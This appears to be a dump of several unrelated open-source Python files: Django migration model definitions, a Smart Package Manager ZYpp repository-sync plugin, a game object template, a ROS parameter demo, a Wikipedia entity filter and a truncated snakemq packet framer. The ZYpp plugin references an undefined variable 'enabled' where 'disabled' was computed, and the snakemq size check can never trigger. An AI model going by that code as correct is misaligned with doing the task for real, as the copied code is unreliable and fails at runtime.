'affiliation': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auth_backend': ('django.db.models.fields.CharField', [], {'default': "'astakos'", 'max_length': '255'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'info_data': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'module': ('django.db.models.fields.CharField', [], {'default': "'local'", 'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_providers'", 'to': "orm['im.AstakosUser']"})
},
'im.astakosuserquota': {
'Meta': {'unique_together': "(('resource', 'user'),)", 'object_name': 'AstakosUserQuota'},
'capacity': ('snf_django.lib.db.fields.IntDecimalField', [], {'max_digits': '38', 'decimal_places': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'resource': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Resource']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"})
},
'im.authproviderpolicyprofile': {
'Meta': {'ordering': "['priority']", 'object_name': 'AuthProviderPolicyProfile'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'authpolicy_profiles'", 'symmetrical': 'False', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_exclusive': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'policy_add': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_automoderate': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_create': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_limit': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True'}),
'policy_login': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_remove': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_required': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_switch': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'authpolicy_profiles'", 'symmetrical': 'False', 'to': "orm['im.AstakosUser']"})
},
'im.chain': {
'Meta': {'object_name': 'Chain'},
'chain': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'im.component': {
'Meta': {'object_name': 'Component'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'auth_token_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'auth_token_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'})
},
'im.emailchange': {
'Meta': {'object_name': 'EmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email_address': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'requested_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'emailchanges'", 'unique': 'True', 'to': "orm['im.AstakosUser']"})
},
'im.endpoint': {
'Meta': {'object_name': 'Endpoint'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'endpoints'", 'to': "orm['im.Service']"})
},
'im.endpointdata': {
'Meta': {'unique_together': "(('endpoint', 'key'),)", 'object_name': 'EndpointData'},
'endpoint': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'data'", 'to': "orm['im.Endpoint']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'im.invitation': {
'Meta': {'object_name': 'Invitation'},
'code': ('django.db.models.fields.BigIntegerField', [], {'db_index': 'True'}),
'consumed': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invitations_sent'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'is_consumed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'realname': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'im.pendingthirdpartyuser': {
'Meta': {'unique_together': "(('provider', 'third_party_identifier'),)", 'object_name': 'PendingThirdPartyUser'},
'affiliation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'third_party_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'im.project': {
'Meta': {'object_name': 'Project'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'project'", 'unique': 'True', 'to': "orm['im.ProjectApplication']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deactivation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'deactivation_reason': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True', 'db_column': "'id'"}),
'last_approval_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['im.AstakosUser']", 'through': "orm['im.ProjectMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True', 'null': 'True', 'db_index': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'im.projectapplication': {
'Meta': {'unique_together': "(('chain', 'id'),)", 'object_name': 'ProjectApplication'},
'applicant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects_applied'", 'to': "orm['im.AstakosUser']"}),
'chain': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'chained_apps'", 'db_column': "'chain'", 'to': "orm['im.Project']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'limit_on_members_number': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'member_join_policy': ('django.db.models.fields.IntegerField', [], {}),
'member_leave_policy': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects_owned'", 'to': "orm['im.AstakosUser']"}),
'resource_grants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['im.Resource']", 'null': 'True', 'through': "orm['im.ProjectResourceGrant']", 'blank': 'True'}),
'response': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'response_actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responded_apps'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'response_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'}),
'waive_actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'waived_apps'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'waive_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'waive_reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'im.projectlog': {
'Meta': {'object_name': 'ProjectLog'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']", 'null': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'from_state': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'log'", 'to': "orm['im.Project']"}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'to_state': ('django.db.models.fields.IntegerField', [], {})
},
'im.projectmembership': {
'Meta': {'unique_together': "(('person', 'project'),)", 'object_name': 'ProjectMembership'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Project']"}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'})
},
'im.projectmembershiplog': {
'Meta': {'object_name': 'ProjectMembershipLog'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']", 'null': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'from_state': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'membership': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'log'", 'to': "orm['im.ProjectMembership']"}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'to_state': ('django.db.models.fields.IntegerField', [], {})
},
'im.projectresourcegrant': {
'Meta': {'unique_together': "(('resource', 'project_application'),)", 'object_name': 'ProjectResourceGrant'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member_capacity': ('snf_django.lib.db.fields.IntDecimalField', [], {'default': '0', 'max_digits': '38', 'decimal_places': '0'}),
'project_application': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.ProjectApplication']", 'null': 'True'}),
'project_capacity': ('snf_django.lib.db.fields.IntDecimalField', [], {'null': 'True', 'max_digits': '38', 'decimal_places': '0'}),
'resource': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Resource']"})
},
'im.resource': {
'Meta': {'object_name': 'Resource'},
'allow_in_projects': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'desc': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'service_origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'service_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'uplimit': ('snf_django.lib.db.fields.IntDecimalField', [], {'default': '0', 'max_digits': '38', 'decimal_places': '0'})
},
'im.serial': {
'Meta': {'object_name': 'Serial'},
'serial': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'im.service': {
'Meta': {'object_name': 'Service'},
'component': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Component']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'im.sessioncatalog': {
'Meta': {'object_name': 'SessionCatalog'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessions'", 'null': 'True', 'to': "orm['im.AstakosUser']"})
},
'im.usersetting': {
'Meta': {'unique_together': "(('user', 'setting'),)", 'object_name': 'UserSetting'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'setting': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"}),
'value': ('django.db.models.fields.IntegerField', [], {})
}
}
complete_apps = ['im']
|
64studio/smart | refs/heads/master | smart/plugins/zyppchannelsync.py | 3 | #
# Written by Jonathan Rocker <linux.learner@gmail.com>
# and Anders F Bjorklund <afb@users.sourceforge.net>
#
# This file is part of Smart Package Manager.
#
# Smart Package Manager is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# Smart Package Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Smart Package Manager; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import posixpath
import os
import ConfigParser
import re
# be compatible with 2.3
import sys
if sys.version_info < (2, 4):
from sets import Set as set
from smart.channel import *
from smart import *
ZYPP_REPOS_DIR = "/etc/zypp/repos.d/"
def _getbasearch():
"""
Get system architecture (like libzypp's ZConfig does it)
"""
import platform
architecture = platform.machine()
if architecture == '':
return "noarch"
# some CPUs report i686 but dont implement cx8 and cmov
# check for both flags in /proc/cpuinfo and downgrade
# to i586 if either is missing (cf opensuse bug #18885)
if architecture == "i686":
if os.path.exists("/proc/cpuinfo"):
cpuinfo = open("/proc/cpuinfo", "r")
for line in cpuinfo.readlines():
if line.startswith("flags"):
if line.find("cx8") == -1 or line.find("cmov") == -1:
architecture = "i586"
return architecture
def _getreleasever():
"""
Get system release and version.
"""
try:
import rpm
except ImportError:
return None
releasever = None
rpmroot = sysconf.get("rpm-root", "/")
ts = rpm.TransactionSet(rpmroot)
if ts.openDB() == 0:
idx = ts.dbMatch('provides', 'openSUSE-release')
if idx.count() == 0:
idx = ts.dbMatch('provides', 'distribution-release')
if idx.count() != 0:
hdr = idx.next()
releasever = str(hdr['version'])
del hdr
del idx
del ts
return releasever
BASEARCH = _getbasearch()
RELEASEVER = _getreleasever()
def _replaceStrings(txt):
"""
Replace some predefined strings that may appear in the repo file.
"""
retxt = re.sub("\$basearch", "%s" % BASEARCH, txt)
retxt = re.sub("\$releasever", "%s" % RELEASEVER, retxt)
return retxt
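# A small usage sketch (values depend on the host; on an x86_64 machine
# running release "12.1" the detected pair would be BASEARCH="x86_64"
# and RELEASEVER="12.1"; the URL is hypothetical):
#
#   _replaceStrings("http://example.org/update/$releasever/$basearch/")
#   # -> "http://example.org/update/12.1/x86_64/"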
def _findBaseUrl(mirrorlist, repo):
"""
Fetches the first suggested mirror from the mirrorlist and use as baseurl.
"""
import urllib
    mirrors = urllib.urlopen(mirrorlist)
    baseurl = None
    while True:
        line = mirrors.readline()
if line.startswith("#"):
continue
elif (line.startswith("http:") or line.startswith("https:") or
line.startswith("ftp:") or line.startswith("file:")):
baseurl = line
break
elif not line:
break
return baseurl
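# A mirrorlist is expected to be plain text with one URL per line; "#"
# lines are comments and the first http/https/ftp/file entry wins.
# Hypothetical example:
#
#   # mirrors for factory-oss
#   http://mirror.example.org/opensuse/factory/repo/oss/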
def _loadRepoFile(filename):
"""
Loads each repository file information.
"""
# The computed aliases we have seen in the given file
seen = set()
repofile = ConfigParser.ConfigParser()
repofile.read(filename)
for repo in repofile.sections():
# Iterate through each repo found in file
alias = "zyppsync-%s" % repo
name = _replaceStrings(repofile.get(repo, 'name'))
baseurl = None
mirrorlist = None
# Some repos have baseurl, some have mirrorlist
if repofile.has_option(repo, 'baseurl'):
baseurl = _replaceStrings(repofile.get(repo, 'baseurl'))
#baseurl = baseurl.splitlines()[1]
elif repofile.has_option(repo, 'mirrorlist'):
mirrorlist = _replaceStrings(repofile.get(repo, 'mirrorlist'))
baseurl = _findBaseUrl(mirrorlist, repo)
        else:
            iface.warning(_("ZYpp channel %s does not contain baseurl or " \
                            "mirrorlist addresses. Not syncing.") % repo)
            continue
        if repofile.has_option(repo, 'enabled'):
            disabled = not repofile.getboolean(repo, 'enabled')
        else:
            disabled = False
if repofile.has_option(repo, 'type'):
type = repofile.get(repo, 'type')
if type == "NONE": type = "rpm-md"
else:
type = "rpm-md"
if baseurl.startswith("cd://"):
baseurl = "localmedia://" + baseurl[6:]
if baseurl.find("?devices=") > -1:
baseurl = baseurl.split("?")[0]
data = {"type": type,
"name": name,
"baseurl": baseurl,
"disabled": enabled}
if mirrorlist:
data["mirrorlist"] = mirrorlist
seen.add(alias)
try:
createChannel(alias, data)
except Error, e:
iface.error(_("While using %s: %s") % (filename, e))
else:
# Store it persistently.
sysconf.set(("channels", alias), data)
return seen
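# For reference, a minimal .repo file this parser accepts could look
# like the following (hypothetical section name and URL):
#
#   [factory-oss]
#   name=openSUSE Factory OSS ($basearch)
#   baseurl=http://download.example.org/factory/repo/oss/
#   enabled=1
#   type=rpm-md
#
# which would be registered as the Smart channel "zyppsync-factory-oss".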
def syncZyppRepos(reposdir, force=None):
"""
Sync Smart channels based on ZYpp repositories.
"""
seen = set()
if os.path.isdir(reposdir):
for entry in os.listdir(reposdir):
if entry.endswith(".repo"):
filepath = os.path.join(reposdir, entry)
if os.path.isfile(filepath):
seen.update(_loadRepoFile(filepath))
# Delete the entries which were not seen in current files.
channels = sysconf.get("channels")
for alias in sysconf.keys("channels"):
if alias.startswith("zyppsync-") and alias not in seen:
sysconf.remove(("channels", alias))
if not sysconf.getReadOnly():
if sysconf.get("sync-zypp-repos",False):
syncZyppRepos(sysconf.get("zypp-repos-dir", ZYPP_REPOS_DIR))
# vim:ts=4:sw=4:et
|
anhstudios/swganh | refs/heads/develop | data/scripts/templates/object/tangible/furniture/jedi/shared_frn_all_light_chair_s02.py | 2 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/furniture/jedi/shared_frn_all_light_chair_s02.iff"
result.attribute_template_id = 6
result.stfName("frn_n","frn_jedi_chair")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
bandi13/cs980-ROS-bot | refs/heads/master | ROS_ws/src/eyes/006_parameters/param_talker.py | 1 | #!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Revision $Id: listener.py 5263 2009-07-17 23:30:38Z sfkwc $
## Demo that fetches parameters from the Parameter Server (global,
## parent and private namespaces) and publishes one of them repeatedly
import rospy
from std_msgs.msg import String
def param_talker():
rospy.init_node('param_talker')
# Fetch values from the Parameter Server. In this example, we fetch
# parameters from three different namespaces:
#
# 1) global (/global_example)
# 2) parent (/foo/utterance)
# 3) private (/foo/param_talker/topic_name)
# fetch a /global parameter
global_example = rospy.get_param("/global_example")
rospy.loginfo("%s is %s", rospy.resolve_name('/global_example'), global_example)
# fetch the utterance parameter from our parent namespace
utterance = rospy.get_param('utterance')
rospy.loginfo("%s is %s", rospy.resolve_name('utterance'), utterance)
# fetch topic_name from the ~private namespace
topic_name = rospy.get_param('~topic_name')
rospy.loginfo("%s is %s", rospy.resolve_name('~topic_name'), topic_name)
# fetch a parameter, using 'default_value' if it doesn't exist
default_param = rospy.get_param('default_param', 'default_value')
rospy.loginfo('%s is %s', rospy.resolve_name('default_param'), default_param)
# fetch a group (dictionary) of parameters
gains = rospy.get_param('gains')
p, i, d = gains['P'], gains['I'], gains['D']
rospy.loginfo("gains are %s, %s, %s", p, i, d)
# set some parameters
rospy.loginfo('setting parameters...')
rospy.set_param('list_of_floats', [1., 2., 3., 4.])
rospy.set_param('bool_True', True)
rospy.set_param('~private_bar', 1+2)
rospy.set_param('to_delete', 'baz')
rospy.loginfo('...parameters have been set')
# delete a parameter
if rospy.has_param('to_delete'):
rospy.delete_param('to_delete')
rospy.loginfo("deleted %s parameter"%rospy.resolve_name('to_delete'))
else:
rospy.loginfo('parameter %s was already deleted'%rospy.resolve_name('to_delete'))
# search for a parameter
param_name = rospy.search_param('global_example')
rospy.loginfo('found global_example parameter under key: %s'%param_name)
# publish the value of utterance repeatedly
pub = rospy.Publisher(topic_name, String, queue_size=10)
while not rospy.is_shutdown():
pub.publish(utterance)
rospy.loginfo(utterance)
rospy.sleep(1)
if __name__ == '__main__':
try:
param_talker()
except rospy.ROSInterruptException: pass
|
kno10/WikipediaEntities | refs/heads/master | subset-recommended.py | 1 | #!/usr/bin/python
import gzip, re, sys
# Minimum phrase length (characters)
minlen = 3
# Minimum number of occurrences
mincount = 50
# Minimum trust value
mintrust = 90
mintrustexact = 80
# Results with exact matches only
exactonly = True
# Minimum contrast, i.e. second may have at most trust < besttrust-mincontrast
mincontrast = 20
# Match the percentage at the end only:
pat = re.compile(r"^(.*?):[0-9:]+:([0-9]+):([0-9]+)%$")
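# Each scored candidate in columns 4+ looks like
# "Target:counts:exactcount:trust%", e.g. (illustrative)
# "Python_(language):120:7:95%": group(1) is the linked article,
# group(2) the exact-match count, group(3) the trust percentage.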
# Output to stdout:
ou = sys.stdout
for line in gzip.open("entities.gz"):
line = line.split("\t")
	phrase, count, used = line[0], int(line[1]), int(line[2])
	if used < mincount: continue
if len(phrase) < minlen: continue
m = pat.match(line[3])
if not m:
print >>sys.stderr, "Did not match:", line
continue
trust = float(m.group(3))
isexact = not (m.group(2) == '0')
if isexact:
if trust < mintrustexact: continue
else:
if trust < mintrust: continue
if exactonly and not isexact: continue
if len(line) > 4:
m2 = pat.match(line[4])
if not m2:
print >>sys.stderr, "Did not match:", line
continue
trust2 = float(m2.group(3))
if trust2 >= trust - mincontrast:
continue
ou.write(phrase)
ou.write("\t")
ou.write(m.group(1))
ou.write("\n")
|
golismero/golismero | refs/heads/master | thirdparty_libs/snakemq/packeter.py | 9 | # -*- coding: utf-8 -*-
"""
Packet format: ``[4B size|payload]``, size is bytes count (unsigned integer in
network order) of all following packet data.
:author: David Siroky (siroky@dasir.cz)
:license: MIT License (see LICENSE.txt or
U{http://www.opensource.org/licenses/mit-license.php})
"""
import logging
import struct
from collections import deque
from snakemq.exceptions import NoConnection
from snakemq.buffers import StreamBuffer
from snakemq.exceptions import SnakeMQBrokenPacket
from snakemq.callbacks import Callback
############################################################################
############################################################################
SEND_BLOCK_SIZE = 64 * 1024
BIN_SIZE_FORMAT = "!I" # network order 32-bit unsigned integer
SIZEOF_BIN_SIZE = struct.calcsize(BIN_SIZE_FORMAT)
############################################################################
############################################################################
def size_to_bin(size):
# make the size a signed integer - negative integers might be
# reserved for future extensions
return struct.pack(BIN_SIZE_FORMAT, size)
#################################################################
def bin_to_size(buf):
return struct.unpack(BIN_SIZE_FORMAT, buf)[0]
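# Round-trip sketch of the two helpers above:
#   size_to_bin(5)                     -> b"\x00\x00\x00\x05"
#   bin_to_size(b"\x00\x00\x00\x05")   -> 5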
############################################################################
############################################################################
class ReceiveBuffer(StreamBuffer):
def __init__(self):
StreamBuffer.__init__(self)
self.packet_size = None # cache for packet size by its header
############################################################
def get_packets(self):
"""
:return: list of fully received packets
"""
packets = []
while self.size:
if self.packet_size is None:
if self.size < SIZEOF_BIN_SIZE:
# wait for more data
break
header = self.get(SIZEOF_BIN_SIZE, True)
self.packet_size = bin_to_size(header)
if self.packet_size < 0:
raise SnakeMQBrokenPacket("wrong packet header")
else:
if self.size < self.packet_size:
# wait for more data
break
packets.append(self.get(self.packet_size, True))
self.packet_size = None
return packets
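    # Incremental feeding sketch -- nothing is yielded until the frame
    # completes:
    #   buf = ReceiveBuffer()
    #   buf.put(size_to_bin(3) + b"ab")
    #   buf.get_packets()   # -> []  (only 2 of 3 payload bytes so far)
    #   buf.put(b"c")
    #   buf.get_packets()   # -> [b"abc"]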
############################################################################
############################################################################
class ConnectionInfo(object):
"""
Connection information and receive buffer handler.
"""
def __init__(self):
self.send_buffer = StreamBuffer()
self.recv_buffer = ReceiveBuffer()
self.send_in_progress = False
self.queued_packet_ids = deque() # pairs of (packet_length, packet_id)
############################################################################
############################################################################
class Packeter(object):
def __init__(self, link):
"""
:param link: :class:`~snakemq.link.Link`
"""
self.link = link
self.log = logging.getLogger("snakemq.packeter")
#{ callbacks
self.on_connect = Callback() #: ``func(conn_id)``
self.on_disconnect = Callback() #: ``func(conn_id)``
self.on_packet_recv = Callback() #: ``func(conn_id, packet)``
#: ``func(conn_id, packet_id)``, just a signal when a packet was fully sent
self.on_packet_sent = Callback()
self.on_error = Callback() #: ``func(conn_id, exception)``
#}
self._connections = {} # conn_id:ConnectionInfo
self._last_packet_id = 0
self.link.on_connect.add(self._on_connect)
self.link.on_disconnect.add(self._on_disconnect)
self.link.on_recv.add(self._on_recv)
self.link.on_ready_to_send.add(self._on_ready_to_send)
###########################################################
###########################################################
def send_packet(self, conn_id, buf):
"""
Queue data to be sent over the link.
:return: packet id
"""
assert type(buf) == bytes
try:
conn = self._connections[conn_id]
except KeyError:
raise NoConnection
self._last_packet_id += 1
packet_id = self._last_packet_id
buf = size_to_bin(len(buf)) + buf
conn.send_buffer.put(buf)
conn.queued_packet_ids.append((len(buf), packet_id))
self._send_to_link(conn_id, conn)
return packet_id
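    # Usage sketch (assuming a connected snakemq.link.Link instance):
    #   packeter = Packeter(link)
    #   packeter.on_packet_recv.add(lambda conn_id, packet: ...)
    #   packet_id = packeter.send_packet(conn_id, b"hello")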
###########################################################
###########################################################
def _on_connect(self, conn_id):
self._connections[conn_id] = ConnectionInfo()
self.on_connect(conn_id)
###########################################################
def _on_disconnect(self, conn_id):
# TODO signal unsent data and unreceived data
del self._connections[conn_id]
self.on_disconnect(conn_id)
###########################################################
def _on_recv(self, conn_id, buf):
recv_buffer = self._connections[conn_id].recv_buffer
recv_buffer.put(buf)
try:
packets = recv_buffer.get_packets()
except SnakeMQBrokenPacket as exc:
self.log.error("conn=%s %r" % (conn_id, exc))
self.on_error(conn_id, exc)
self.link.close(conn_id)
return
